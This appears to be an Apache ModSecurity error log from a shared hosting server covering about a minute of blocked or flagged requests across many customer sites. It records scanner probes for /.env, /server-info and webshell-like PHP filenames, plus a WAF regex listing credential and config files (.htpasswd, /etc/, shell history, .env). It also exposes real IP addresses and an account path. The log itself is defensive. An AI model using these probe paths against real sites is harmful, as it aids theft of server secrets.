[Tue May 26 15:50:13.557960 2026] [core:crit] [pid 745492:tid 745627] (13)Permission denied: [client 40.77.167.11:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:50:14.316472 2026] [security2:error] [pid 745492:tid 745689] [client 223.123.35.44:36234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVz3omEQglTmoWcfxJ-BAAAAMU"]
[Tue May 26 15:50:14.316607 2026] [security2:error] [pid 745492:tid 745689] [client 223.123.35.44:36234] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVz3omEQglTmoWcfxJ-BAAAAMU"]
[Tue May 26 15:50:14.802910 2026] [security2:error] [pid 745492:tid 745742] [client 103.153.130.62:51578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVz3omEQglTmoWcfxJ-FAAAAPo"]
[Tue May 26 15:50:14.803032 2026] [security2:error] [pid 745492:tid 745742] [client 103.153.130.62:51578] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVz3omEQglTmoWcfxJ-FAAAAPo"]
[Tue May 26 15:50:14.841526 2026] [security2:error] [pid 747840:tid 748087] [client 74.7.244.7:45270] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.adityacreations.co.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVz3om6MwAuYuZKxvnyFwABfxQ"]
[Tue May 26 15:50:15.449128 2026] [security2:error] [pid 747840:tid 748033] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz34m6MwAuYuZKxvnyHwAAAUk"]
[Tue May 26 15:50:16.771404 2026] [security2:error] [pid 747840:tid 748066] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz4Im6MwAuYuZKxvnyPQAAAWo"]
[Tue May 26 15:50:18.493620 2026] [security2:error] [pid 747840:tid 748045] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz4om6MwAuYuZKxvnyYwAAAVU"]
[Tue May 26 15:50:21.008151 2026] [security2:error] [pid 747840:tid 747973] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz5Im6MwAuYuZKxvnygAAAAQ0"]
[Tue May 26 15:50:22.815387 2026] [security2:error] [pid 747840:tid 748060] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz5om6MwAuYuZKxvnylwAAAWQ"]
[Tue May 26 15:50:25.042266 2026] [security2:error] [pid 747840:tid 748069] [client 173.239.254.120:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVz54m6MwAuYuZKxvnysQABbSw"]
[Tue May 26 15:50:25.421368 2026] [security2:error] [pid 747840:tid 748030] [client 103.153.130.62:52009] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVz6Ym6MwAuYuZKxvnyxwAAAUY"]
[Tue May 26 15:50:25.421615 2026] [security2:error] [pid 747840:tid 748030] [client 103.153.130.62:52009] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVz6Ym6MwAuYuZKxvnyxwAAAUY"]
[Tue May 26 15:50:26.232946 2026] [security2:error] [pid 745492:tid 745740] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz6YmEQglTmoWcfxJ-jwAAAPg"]
[Tue May 26 15:50:27.240443 2026] [security2:error] [pid 745492:tid 745701] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz6omEQglTmoWcfxJ-pAAAANE"]
[Tue May 26 15:50:27.704404 2026] [security2:error] [pid 747840:tid 748075] [client 168.119.123.75:39582] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVz64m6MwAuYuZKxvny2gAAAXM"], referer: https://thegoodsporting.com
[Tue May 26 15:50:29.359066 2026] [security2:error] [pid 745492:tid 745678] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz7ImEQglTmoWcfxJ-0QAAALo"]
[Tue May 26 15:50:29.364068 2026] [security2:error] [pid 745492:tid 745531] [remote 88.198.165.116:33108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVz7YmEQglTmoWcfxJ-2QAA6iM"]
[Tue May 26 15:50:30.273489 2026] [security2:error] [pid 745492:tid 745672] [client 143.110.243.118:36218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/w0.php"] [unique_id "ahVz7omEQglTmoWcfxJ-6AAAALQ"]
[Tue May 26 15:50:30.998436 2026] [security2:error] [pid 745492:tid 745705] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz7omEQglTmoWcfxJ-6gAAANU"]
[Tue May 26 15:50:33.561253 2026] [security2:error] [pid 745492:tid 745631] [client 145.239.10.137:58179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.10.239.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greattusker.com"] [uri "/Masks.php"] [unique_id "ahVz8YmEQglTmoWcfxJ_DAAAAIs"], referer: http://greattusker.com/Masks.php
[Tue May 26 15:50:33.788235 2026] [security2:error] [pid 747840:tid 748060] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz8Ym6MwAuYuZKxvnzEgAAAWQ"]
[Tue May 26 15:50:33.907132 2026] [security2:error] [pid 745492:tid 745625] [client 123.16.212.226:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz8YmEQglTmoWcfxJ_CgAAAIU"]
[Tue May 26 15:50:35.549978 2026] [security2:error] [pid 747840:tid 748075] [client 114.119.137.141:50207] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "m2wealthadvisor.com"] [uri "/commodity-services/index.html"] [unique_id "ahVz84m6MwAuYuZKxvnzHQAAAXM"], referer: http://m2wealthadvisor.com/
[Tue May 26 15:50:35.622577 2026] [security2:error] [pid 745492:tid 745737] [client 103.153.130.62:52303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVz84mEQglTmoWcfxJ_NgAAAPU"]
[Tue May 26 15:50:35.622724 2026] [security2:error] [pid 745492:tid 745737] [client 103.153.130.62:52303] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVz84mEQglTmoWcfxJ_NgAAAPU"]
[Tue May 26 15:50:35.912377 2026] [security2:error] [pid 745492:tid 745709] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz84mEQglTmoWcfxJ_MwAAANk"]
[Tue May 26 15:50:36.737788 2026] [security2:error] [pid 745492:tid 745715] [client 143.110.243.118:47864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/old-index.php"] [unique_id "ahVz9ImEQglTmoWcfxJ_PwAAAN8"]
[Tue May 26 15:50:37.794515 2026] [security2:error] [pid 747840:tid 748040] [client 45.148.10.159:41268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/test.php"] [unique_id "ahVz9Ym6MwAuYuZKxvnzPgAAAVA"]
[Tue May 26 15:50:37.908420 2026] [security2:error] [pid 747840:tid 747991] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz9Ym6MwAuYuZKxvnzOgAAAR8"]
[Tue May 26 15:50:38.176047 2026] [security2:error] [pid 747840:tid 747971] [client 45.148.10.159:41282] ModSecurity: Access denied with code 406 (phase 2). Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "724"] [id "340114"] [rev "2"] [msg "Atomicorp.com WAF Rules: Apache admin service access attempt"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/server-info"] [unique_id "ahVz9om6MwAuYuZKxvnzQAAAAQs"]
[Tue May 26 15:50:39.092739 2026] [security2:error] [pid 747840:tid 748018] [client 20.104.227.76:6891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.toplaptopguides.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVz94m6MwAuYuZKxvnzRgAAATo"]
[Tue May 26 15:50:40.031185 2026] [security2:error] [pid 747840:tid 748057] [client 176.65.139.239:59754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "worldwidecourier.co.in"] [uri "/.env"] [unique_id "ahVz-Im6MwAuYuZKxvnzUgAAAWE"]
[Tue May 26 15:50:40.073491 2026] [security2:error] [pid 747840:tid 748084] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz94m6MwAuYuZKxvnzTwAAAXw"]
[Tue May 26 15:50:40.131862 2026] [security2:error] [pid 747840:tid 747994] [client 176.65.139.236:61864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/.env"] [unique_id "ahVz-Im6MwAuYuZKxvnzVAAAASI"]
[Tue May 26 15:50:40.884009 2026] [security2:error] [pid 747840:tid 747990] [client 45.148.10.159:41282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/server-info.php"] [unique_id "ahVz-Im6MwAuYuZKxvnzWAAAAR4"]
[Tue May 26 15:50:41.991759 2026] [security2:error] [pid 747840:tid 748013] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz-Ym6MwAuYuZKxvnzZQAAATU"]
[Tue May 26 15:50:42.392098 2026] [security2:error] [pid 745492:tid 745566] [remote 74.7.241.58:44006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVz-omEQglTmoWcfxJ_fwAAoUY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/wp-admin/includes
[Tue May 26 15:50:42.429509 2026] [security2:error] [pid 747840:tid 748078] [client 20.104.227.76:26924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.toplaptopguides.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVz-om6MwAuYuZKxvnzbgAAAXY"]
[Tue May 26 15:50:44.145486 2026] [security2:error] [pid 747840:tid 747984] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz-4m6MwAuYuZKxvnzeQAAARg"]
[Tue May 26 15:50:46.087981 2026] [security2:error] [pid 745492:tid 745673] [client 103.153.130.62:52593] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVz_omEQglTmoWcfxJ_qAAAALU"]
[Tue May 26 15:50:46.088119 2026] [security2:error] [pid 745492:tid 745673] [client 103.153.130.62:52593] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVz_omEQglTmoWcfxJ_qAAAALU"]
[Tue May 26 15:50:46.454134 2026] [security2:error] [pid 745492:tid 745689] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz_omEQglTmoWcfxJ_pwAAAMU"]
[Tue May 26 15:50:47.257758 2026] [security2:error] [pid 745492:tid 745577] [remote 5.42.158.148:53628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVz_4mEQglTmoWcfxJ_uQAAjFE"]
[Tue May 26 15:50:47.866262 2026] [security2:error] [pid 745492:tid 745696] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz_4mEQglTmoWcfxJ_wAAAAMw"]
[Tue May 26 15:50:49.960746 2026] [security2:error] [pid 745492:tid 745585] [remote 193.42.61.12:51124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV0AYmEQglTmoWcfxJ_3gAAx1k"]
[Tue May 26 15:50:50.361851 2026] [security2:error] [pid 747840:tid 748071] [client 143.110.243.118:47012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wsanon.php"] [unique_id "ahV0Aom6MwAuYuZKxvnztQAAAW8"]
[Tue May 26 15:50:50.481037 2026] [security2:error] [pid 747840:tid 748031] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0Aom6MwAuYuZKxvnzqwAAAUc"]
[Tue May 26 15:50:52.370535 2026] [security2:error] [pid 745492:tid 745602] [remote 45.32.67.165:49136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV0BImEQglTmoWcfxKADQAArmo"]
[Tue May 26 15:50:52.625084 2026] [security2:error] [pid 745492:tid 745662] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0BImEQglTmoWcfxKAEAAAAKo"]
[Tue May 26 15:50:55.010812 2026] [security2:error] [pid 747840:tid 747997] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0Bom6MwAuYuZKxvnz3QAAASU"]
[Tue May 26 15:50:55.080471 2026] [security2:error] [pid 747840:tid 748015] [client 103.44.52.196:35332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0Bom6MwAuYuZKxvnz4gAAATc"]
[Tue May 26 15:50:55.080612 2026] [security2:error] [pid 747840:tid 748015] [client 103.44.52.196:35332] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0Bom6MwAuYuZKxvnz4gAAATc"]
[Tue May 26 15:50:55.104598 2026] [security2:error] [pid 747840:tid 748067] [client 138.59.207.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV0B4m6MwAuYuZKxvnz6gAAAWs"], referer: https://anujtradingco.com
[Tue May 26 15:50:56.704876 2026] [security2:error] [pid 745492:tid 745725] [client 103.153.130.62:52887] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0CImEQglTmoWcfxKAUAAAAOk"]
[Tue May 26 15:50:56.705044 2026] [security2:error] [pid 745492:tid 745725] [client 103.153.130.62:52887] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0CImEQglTmoWcfxKAUAAAAOk"]
[Tue May 26 15:50:56.725557 2026] [security2:error] [pid 745492:tid 745717] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0CImEQglTmoWcfxKASgAAAOE"]
[Tue May 26 15:50:57.505777 2026] [security2:error] [pid 745492:tid 745748] [client 20.104.227.76:52761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.toplaptopguides.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahV0CYmEQglTmoWcfxKAXQAAAQA"]
[Tue May 26 15:50:58.972444 2026] [security2:error] [pid 745492:tid 745676] [client 20.104.227.76:13285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.toplaptopguides.com.md-74.webhostbox.net"] [uri "/function/function.php"] [unique_id "ahV0ComEQglTmoWcfxKAdQAAALg"]
[Tue May 26 15:50:59.134832 2026] [security2:error] [pid 745492:tid 745639] [client 91.148.248.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0ComEQglTmoWcfxKAcQAAAJM"]
[Tue May 26 15:50:59.310751 2026] [security2:error] [pid 745492:tid 745727] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0ComEQglTmoWcfxKAdAAAAOs"]
[Tue May 26 15:51:01.031944 2026] [security2:error] [pid 747840:tid 748005] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0DIm6MwAuYuZKxvn0MQAAAS0"]
